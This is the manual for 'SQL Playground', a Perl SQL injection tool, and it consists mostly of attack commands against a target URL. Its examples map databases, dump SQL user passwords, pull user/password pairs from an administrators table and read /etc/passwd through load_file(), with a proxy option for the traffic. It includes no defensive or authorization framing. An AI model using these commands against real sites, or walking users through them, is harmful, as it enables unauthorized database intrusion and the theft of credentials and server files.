SQL Playground MANUAL

Program: SQL Playground [sp]
Version: 2.0
Credits: Charles "real" F. <charlesfol[at]hotmail.fr>
Please mail me if you modify this program or redistribute it.

sp is a Perl tool for performing SQL injection easily and quickly.
It supports several attack vectors (blind, union, error-based).
sp uses dichotomy (binary search over the charset) to perform blind SQL injections.

Target definition

sp> target <URL>

sp will try to obtain an ERROR message to determine the DATABASE TYPE, and a MATCH message to use for BLIND SQL injections.

Information

sp> info [custom]

custom: the type of information to show

VALUE    INFO
T        Target
P/p      Parameters
D/d      Databases
t        Tables
C/c      Columns
Q/q      Queries

sp> info Tp    // Print information about target and parameters

Param value assignment

sp> set <param> <value>

Set <param> value to <value>.

sp> set MATCH <b>Title</b>    // Set MATCH value to <b>Title</b>

Save/Load

sp> save [logfile]
sp> load <logfile>

Using save without arguments saves data to the last loaded file.
Logfiles are created in the ./data/ directory and their extension is ".xml".
A logfile stores the target URL, arg, match & error, union params (shown and fields), and other parameters.

Charset

sp> charset <all|num|md5|alpha|alphanum|custom>

Set the charset for blind attacks.

VALUE          CHARSET
all            etaonisrhldcumfpwgbyvkxjqz0123456789_-\$.^()[]{}¦*\"'@=/\|#?+&!`<>:;,\
num            0123456789
md5            abcdef0123456789
alpha          etaonisrhldcumfpwgbyvkxjqz
alphanum       etaonisrhldcumfpwgbyvkxjqz0123456789
anything else  what you want

sp> charset abc012    // Set charset to "abc012" [customised value]

UNION Configuration

sp> union-conf

If you want to use the UNION features, you must configure them first with this command. It sets the FIELDS and SHOWN values, which are required for UNION and MUNION attacks.
You can view them with "infop" or set them yourself using "set".

SQL Mapping

sp> union-map <dbs|tables|columns> [from <table|db>]
sp> munion-map <dbs|tables|columns> [from <table|db>]
sp> blind-map <dbs|tables|columns> [from <table|db>]
sp> guess-map <tables|columns> [from <table>]

As you can see, there are 4 ways to map the database.
UNION uses a UNION query.
MUNION uses UNION too, but is useful when only 1 SQL row is printed on the page.
BLIND uses blind SQL injection.
GUESS tries to guess table or column names using a dictionary.

Everything that is found is added to a specific list that you can view using "info".
Here are several examples with explanations.

sp> union-map dbs    // This will list all databases
sp> blind-map dbs    // This will list all databases
sp> union-map tables from database03    // This will list tables from database "database03"
sp> blind-map columns from db03.admins    // This will list columns from table "admins", which is in database "db03"
sp> guess-map columns from news    // This will guess columns of table "news"
sp> munion-map columns from news    // This will list columns from table "news"

Database Dump

sp> dump-map [custom]

custom: the type of information to dump (by default, everything is dumped)

VALUE    INFO
D        Databases
T        Tables
C        Columns

SQL Credentials

sp> union-cred
sp> blind-cred

This will list SQL users and their passwords.

SQL Files

sp> union-file-get <file>
sp> blind-file-get <file> [start]

Try to get the content of <file> using SQL "load_file()".

sp> blind-file-search <file> <string>

Try to find <string> in <file> using SQL "load_file()".

sp> guess-files

Try to find interesting files.

sp> blind-file-get /etc/passwd 193    // Get /etc/passwd content, starting at char n°193
sp> blind-file-search /etc/passwd admin    // Find the word "admin" in the /etc/passwd file

SQL Basic Queries

sp> union <query>
sp> munion <query>
sp> blind <query>
sp> mblind <query>

As you can see, there are 4 ways to run a query.
UNION uses a UNION query.
MUNION uses UNION too, but is useful when only 1 SQL row is printed on the page.
BLIND uses blind SQL injection.
MBLIND uses blind SQL injection too, but prints all rows.

If only 1 row is found, the result is saved into QUERIES ("infoq" to see them).
Here are several examples with explanations.

sp> blind version()    // Note: version() returns 1 row only, so it will be saved into QUERIES.
sp> mblind SELECT user,password FROM administrators    // This will dump every "user,password" pair of table administrators
sp> union SELECT user,password FROM administrators    // This will dump every "user,password" pair of table administrators
sp> munion SELECT user,password FROM administrators    // Same, but works even if only 1 row is printed

Proxy

sp> proxy <proxy>:<port>
sp> proxy disable

Enable or disable HTTP proxy.

Notes

"reinit" reinitializes everything.